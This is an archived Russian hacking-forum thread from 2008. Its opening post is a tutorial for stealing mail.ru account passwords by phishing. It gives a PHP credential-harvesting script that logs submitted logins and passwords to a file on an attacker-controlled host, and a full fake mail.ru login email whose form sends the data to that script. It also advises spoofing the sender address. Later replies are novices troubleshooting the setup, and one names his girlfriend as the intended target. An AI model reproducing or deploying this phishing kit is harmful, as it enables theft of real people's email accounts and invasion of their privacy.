Работаете через Tor? Используйте нашу onion-версию сайта: forum.h4ckorsoftgfvvng.onion
Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Песочница
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Песочница Место для общения ламеров новичков

Ответ
 
Опции темы
Старый 12.07.2008, 03:28   #1
ZncDD
advanced 
 
Регистрация: 11.10.2007
Прописка: 127.0.0.1
Сообщений: 165
Вес репутации: 9 ZncDD специалистZncDD специалистZncDD специалистZncDD специалистZncDD специалистZncDD специалист
Депозит: 0$
Вы сказали Спасибо: 15
Поблагодарили 150 раз(а) в 45 сообщениях
[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
Код:
km.ru
nextmail.ru
hobby.ru
webrise.ru
lapin.ru
free.dl-hosting.ru
hostow.net
beplaced.ru
777host.ru
paltus.ru
miraclehost.ru
freebox.ru
alfaspace.net
k70.ru
hosting.promostudio.ru
chat.ru
maxhost.ru
nixup.com
e2e.ru
noka.ru
newmail.ru
boom.ru
h15.ru
hut.ru
jino-net.ru
pochta.ru
unlimhost.ru
onepage.ru
by.ru
sbn.bz
yard.ru
domainhosting.ru
orthodoxy.ru
webservis.ru
ru-web.net
activehost.ru
househost.ru
bestof.ru
addr.ru
hosting.dump.ru
pesni.ru
medbox.ru
fatal.ru
x5x.ru
hopshot.com
5gigs.com
wagoo.com
orgfree.com
awardspace.com
bobos.ca
www.host.sk
zportal.info
spaceall.de
3x.ro
sretenie.ru
dotgeek.org
sevhosting.net
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru
chat.ru
boom.ru
by.ru


Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
PHP код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее:
Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
Сохраним в файл mes.php и зальем на хостинг.
Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
PHP код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
Цитата:http://www.svkadr.ru/vr/conf/index.php?mail=1


Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!


Прежде чем создавать тему/писать сообщение:
Правила форума! Прочесть обязательно!
ZncDD вне форума   Ответить с цитированием
Благодарности: 2
Старый 18.07.2008, 12:03   #2
kirimey
adherent 
 
Регистрация: 09.07.2008
Сообщений: 6
Вес репутации: 0 kirimey новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
а скажите пожалуйста я вот все проделал по вашим пунктам, только не понял как на файл права давать на хостинге. ничего не получилось
я не пойму зачем именно надо файлы размещать на хостинге и почему ничего не получилось

добавлено через 2 минуты
а есть еще какие нибудь методы???

Последний раз редактировалось kirimey, 18.07.2008 в 12:05. Причина: Добавлено сообщение
kirimey вне форума   Ответить с цитированием
Старый 18.07.2008, 12:41   #3
Gia
advanced 
 
Аватар для Gia
 
Регистрация: 10.07.2008
Прописка: Сеть
Сообщений: 309
Вес репутации: 9 Gia знатокGia знатокGia знаток
Депозит: 0$
Вы сказали Спасибо: 35
Поблагодарили 40 раз(а) в 35 сообщениях
так вопрос наитупейший, но в каком редакторе делать снифер и как ево залить на хост?
Gia вне форума   Ответить с цитированием
Старый 18.07.2008, 13:16   #4
Kanaris
Администратор 
 
Аватар для Kanaris
 
Регистрация: 24.07.2007
Прописка: Везде, где есть воздух
Сообщений: 1,642
Вес репутации: 76 Kanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris эксперт
Депозит: 0$
Вы сказали Спасибо: 237
Поблагодарили 1,128 раз(а) в 427 сообщениях
редактор называется notepad (блокнот) а заливать на сервак через любой фтп-клиент
Kanaris вне форума   Ответить с цитированием
Старый 18.07.2008, 13:53   #5
Gia
advanced 
 
Аватар для Gia
 
Регистрация: 10.07.2008
Прописка: Сеть
Сообщений: 309
Вес репутации: 9 Gia знатокGia знатокGia знаток
Депозит: 0$
Вы сказали Спасибо: 35
Поблагодарили 40 раз(а) в 35 сообщениях
все получается. ток скажите каконибудь хост

добавлено через 18 минут
а какой клиент и хост лучше?

добавлено через 25 минут
млин ну скажите каконибудь хост

Последний раз редактировалось Gia, 18.07.2008 в 14:18. Причина: Добавлено сообщение
Gia вне форума   Ответить с цитированием
Старый 18.07.2008, 15:19   #6
goblin
advanced 
 
Аватар для goblin
 
Регистрация: 27.05.2008
Прописка: за компом
Сообщений: 327
Вес репутации: 12 goblin новичекgoblin новичекgoblin новичекgoblin новичекgoblin новичекgoblin новичек
Депозит: 0$
Вы сказали Спасибо: 14
Поблагодарили 39 раз(а) в 30 сообщениях
Цитата:
ток скажите каконибудь хост
http://www.google.ru/search?hl=ru&q=...&lr=&aq=-1&oq=

Качественная спам рассылка по городам России
goblin вне форума   Ответить с цитированием
Благодарности goblin от:
Старый 21.07.2008, 10:35   #7
kirimey
adherent 
 
Регистрация: 09.07.2008
Сообщений: 6
Вес репутации: 0 kirimey новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
даа! вопрос один, а ответы другие.
А скажите какие еще способы есть, ведь далеко не все клюнут, скажем моя девушка вообще писма не читает, а просто сразу удаляет
kirimey вне форума   Ответить с цитированием
Старый 31.07.2008, 16:55   #8
Данил
adherent 
 
Регистрация: 31.07.2008
Сообщений: 67
Вес репутации: 2 Данил новичек
Депозит: 0$
Вы сказали Спасибо: 14
Поблагодарили 2 раз(а) в 2 сообщениях
Подскажите пожалуйста, что я не так делаю? При отправке письма приходит просто код, а не поля "введите адрес" и т.д. Проверял на своем ящике

добавлено через 3 часа 36 минут
А все, отправилось. Только в меил.тхт ничего нет. Возможно, хостинг кривой

добавлено через 5 часов 24 минуты
Можно ли поподробней о chmod?

Последний раз редактировалось Данил, 31.07.2008 в 22:19. Причина: Добавлено сообщение
Данил вне форума   Ответить с цитированием
Старый 01.08.2008, 18:15   #9
Данил
adherent 
 
Регистрация: 31.07.2008
Сообщений: 67
Вес репутации: 2 Данил новичек
Депозит: 0$
Вы сказали Спасибо: 14
Поблагодарили 2 раз(а) в 2 сообщениях
Все, залил файлы на фтп-сервер, установил права, но только файл мес.пхп не открывается (еррор 404). На самом сервере написано, что ссылка может не работать, если у меня нет доменного имени, а его подключение стоит 2,40$
Данил вне форума   Ответить с цитированием
Старый 01.08.2008, 19:35   #10
Данил
adherent 
 
Регистрация: 31.07.2008
Сообщений: 67
Вес репутации: 2 Данил новичек
Депозит: 0$
Вы сказали Спасибо: 14
Поблагодарили 2 раз(а) в 2 сообщениях
Да мне бы хотя бы найти нормальный хостинг, а то то php нет, то chmod нет, то не заливается, то не открывается, то регистрация временно завершена, совсем запарился искать
Данил вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 12:17.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru